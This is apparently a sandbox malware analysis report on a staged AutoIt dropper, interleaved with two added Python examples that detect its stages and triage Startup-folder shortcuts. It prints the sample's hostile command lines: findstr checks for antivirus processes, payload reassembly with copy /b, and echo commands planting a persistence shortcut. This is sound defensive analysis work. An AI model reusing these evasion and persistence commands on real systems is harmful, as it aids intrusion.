Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523781
MD5: db7b43084f7a44e3290774e36d49ce41
SHA1: 1e1321a6e0c6f63b719daccdacbde4a10547021e
SHA256: a6da6ca04ee56f1e10dc25c07f938300fff7b3c1b50abe925b5f2b10b084216b
Tags: exe, user-Bitsight

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DB7B43084F7A44E3290774E36D49CE41)
    • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3428 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2872 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 824 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2008 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2688 cmdline: cmd /c md 182349 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5752 cmdline: findstr /V "RefundAlienConservativeChapters" Coral MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6640 cmdline: cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Beginners.pif (PID: 7092 cmdline: Beginners.pif l MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 1900 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5996 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 2416 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.scr (PID: 1460 cmdline: "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches
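The process tree above is the whole chain in one view: a batch stage that greps tasklist output for security-product names (findstr /I "wrsa opssvc", then "avastui avgui bdservicehost nswscsvc sophoshealth"), a cmd /c copy /b that stitches a binary together from dropped fragments, an AutoIt-compiled .pif launched from %TEMP%, a .url shortcut written into the per-user Startup folder, and finally wscript.exe running a .js under AppData that launches a .scr copy of the same binary. The following detection logic is an added example (not part of the Joe Sandbox report or any vendor product): it encodes each of those stages as a rule over a simplified, assumed event schema (image, cmdline, target), runs them over events constructed from the command lines and paths in the report, and only calls the result a chain when several stages co-occur, because findstr and copy /b on their own are common in legitimate scripts.

```python
"""Stage-by-stage detection for the staged dropper chain shown in the process tree.

Added example; the event records below are constructed from the report's
command lines and paths, and the field names are an assumed simplified schema,
not a real EDR or Sysmon format.
"""
import re
from dataclasses import dataclass

# Security-product process names the batch stage greps for (from the report).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "sophoshealth"}
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")


@dataclass
class ProcEvent:          # process creation
    image: str
    cmdline: str


@dataclass
class FileEvent:          # file creation (Sysmon EventID 11 equivalent)
    image: str
    target: str


def av_discovery(ev: ProcEvent) -> bool:
    """findstr /I "<names>" where the names are security products."""
    if not ev.image.lower().endswith("findstr.exe"):
        return False
    m = re.search(r'/i\s+"([^"]+)"', ev.cmdline, re.I)
    return bool(m) and bool(set(m.group(1).lower().split()) & AV_PROCESS_NAMES)


def fragment_reassembly(ev: ProcEvent) -> bool:
    """cmd /c copy /b a + b + c ... : a payload stitched from dropped fragments."""
    m = re.search(r"copy\s+/b\s+(.+)", ev.cmdline, re.I)
    return ev.image.lower().endswith("cmd.exe") and bool(m) and m.group(1).count("+") >= 2


def pif_from_temp(ev: ProcEvent) -> bool:
    """A .pif launched out of %TEMP% (here an AutoIt-compiled binary)."""
    img = ev.image.lower()
    return img.endswith(".pif") and "\\appdata\\local\\temp\\" in img


def wsh_script_from_appdata(ev: ProcEvent) -> bool:
    """wscript/cscript running a script stored under AppData."""
    if not ev.image.lower().endswith(("wscript.exe", "cscript.exe")):
        return False
    cmd = ev.cmdline.lower().rstrip('" ')
    return "\\appdata\\" in cmd and cmd.endswith(SCRIPT_EXTS)


def startup_url_drop(ev: FileEvent) -> bool:
    """A .url shortcut written into the per-user Startup folder."""
    t = ev.target.lower()
    return STARTUP_DIR in t and t.endswith(".url")


def scr_outside_windows(ev: FileEvent) -> bool:
    """A screensaver binary created outside %SystemRoot%."""
    t = ev.target.lower()
    return t.endswith(".scr") and not t.startswith("c:\\windows\\")


PROC_RULES = {"av_discovery": av_discovery, "fragment_reassembly": fragment_reassembly,
              "pif_from_temp": pif_from_temp, "wsh_script_from_appdata": wsh_script_from_appdata}
FILE_RULES = {"startup_url_drop": startup_url_drop, "scr_outside_windows": scr_outside_windows}


def detect(proc_events, file_events) -> dict:
    """Map each matched stage name to the command lines / paths that triggered it."""
    hits = {}
    for ev in proc_events:
        for name, rule in PROC_RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev.cmdline)
    for ev in file_events:
        for name, rule in FILE_RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev.target)
    return hits


def is_chain(hits: dict, min_stages: int = 3) -> bool:
    """Single stages are noisy (findstr, copy /b are legitimate); require several."""
    return len(hits) >= min_stages


# Constructed events mirroring the report's process tree (plus one benign line).
PROC_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ProcEvent(r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    ProcEvent(r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "RefundAlienConservativeChapters" Coral'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\182349\Beginners.pif", "Beginners.pif l"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", "cmd /c md 182349"),
]
FILE_EVENTS = [
    FileEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url"),
    FileEvent(r"C:\Users\user\AppData\Local\Temp\182349\Beginners.pif",
              r"C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr"),
]

if __name__ == "__main__":
    hits = detect(PROC_EVENTS, FILE_EVENTS)
    for stage, evidence in hits.items():
        print(f"{stage}: {evidence}")
    print("chain:", is_chain(hits))
```

The AV name list is deliberately the one the sample itself uses; extend it from other samples of the same family rather than from a generic product list, because the discovery stage is only interesting when the names match what the dropper checks for. The min_stages threshold is the knob that trades recall against noise from build scripts that legitimately use copy /b.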

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , ProcessId: 2416, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: Beginners.pif l, CommandLine: Beginners.pif l, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: Beginners.pif l, ProcessId: 7092, ProcessName: Beginners.pif
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , ProcessId: 2416, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1900, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
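The persistence artifact behind this hit is the TradeHub.url file that cmd.exe (PID 1900) writes with two echo commands: a "[InternetShortcut]" header and a URL= line pointing at a local .js file under AppData rather than at a web address. Explorer resolves such a shortcut at logon and hands the .js to wscript.exe, which is how the second tree (wscript.exe, then TradeHub.scr) starts. The triage helper below is an added example (not from the report or any Joe Sandbox component): it parses .url text the way the dropper writes it, including the trailing spaces cmd.exe leaves before a redirect and the quotes around the path, resolves both C:\ and file:/// forms, and flags shortcuts whose target is a script or screensaver in a user-writable location. The sample shortcut text is constructed from the echo commands in the tree; the risk rules are this example's own heuristics.

```python
"""Triage of Startup-folder .url shortcuts that launch local scripts.

Added example, not part of the Joe Sandbox report. SAMPLE_URL is constructed
from the echo commands in the process tree; the suspicious-extension and
user-writable-directory rules are this example's own heuristics.
"""
import re
from pathlib import Path, PureWindowsPath

# Extensions that should never be the target of an autostart shortcut.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta",
               ".scr", ".pif", ".bat", ".cmd", ".ps1"}
# Path components that mark user-writable staging locations.
USER_WRITABLE = ("appdata", "temp", "public", "programdata", "downloads")


def parse_internet_shortcut(text: str) -> dict:
    """Minimal INI parser for .url files; tolerant of trailing spaces and quotes."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, val = line.split("=", 1)
            fields[key.strip().lower()] = val.strip().strip('"')
    return fields


def local_target(url: str):
    """Return the Windows path a URL= value launches, or None for a web URL."""
    if re.match(r"^file:///?", url, re.I):
        url = re.sub(r"^file:///?", "", url, flags=re.I).replace("/", "\\")
    if re.match(r"^[a-z]:\\", url, re.I):
        return PureWindowsPath(url)
    return None


def triage(text: str) -> dict:
    """Classify one .url file's text; 'reasons' explains any suspicious verdict."""
    url = parse_internet_shortcut(text).get("url", "")
    target = local_target(url)
    reasons = []
    if target is not None:
        if target.suffix.lower() in SCRIPT_EXTS:
            reasons.append(f"autostart shortcut launches a {target.suffix.lower()} file")
        parts = [p.lower() for p in target.parts]
        if any(w in p for p in parts for w in USER_WRITABLE):
            reasons.append("target lives in a user-writable directory")
    return {"url": url, "target": None if target is None else str(target),
            "suspicious": bool(reasons), "reasons": reasons}


def scan_startup_folder(folder) -> list:
    """Triage every .url in a Startup folder on a live host (results per file)."""
    results = []
    for p in Path(folder).glob("*.url"):
        r = triage(p.read_text(encoding="utf-8", errors="replace"))
        r["file"] = str(p)
        results.append(r)
    return results


# Constructed from: echo [InternetShortcut] > TradeHub.url & echo URL="...TradeHub.js" >> TradeHub.url
SAMPLE_URL = (
    "[InternetShortcut] \n"
    "URL=\"C:\\Users\\user\\AppData\\Local\\TradeOptimize Dynamics\\TradeHub.js\" \n"
)
BENIGN_URL = "[InternetShortcut]\nURL=https://example.org/\n"

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_URL), ("benign", BENIGN_URL)):
        print(name, triage(text))
```

On a live host, point scan_startup_folder at the per-user Startup folder (the path in the Sigma hit above) and at the all-users one under ProgramData; a .url whose target is a local script or .scr should be treated as persistence regardless of what the shortcut is named.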

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 2008, ProcessName: findstr.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Virustotal: Detection: 10%
Source: file.exe; Virustotal: Detection: 16%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.5% probability
Source: file.exe; Joe Sandbox ML: detected
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DC4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DC494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DCC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DCCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DCCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DCF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DCF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DCFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DC3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\182349\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\182349
Source: unknown; DNS traffic detected: query: bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH reply code: Name error (3)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_001229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; DNS traffic detected: DNS query: bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000000.1687736473.0000000000179000.00000002.00000001.01000000.00000006.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr, 0000000F.00000002.3506982744.0000000000E29000.00000002.00000001.01000000.00000008.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Sp.0.dr; String found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.dr; String found in binary or memory: https://www.globalsign.com/repository/06
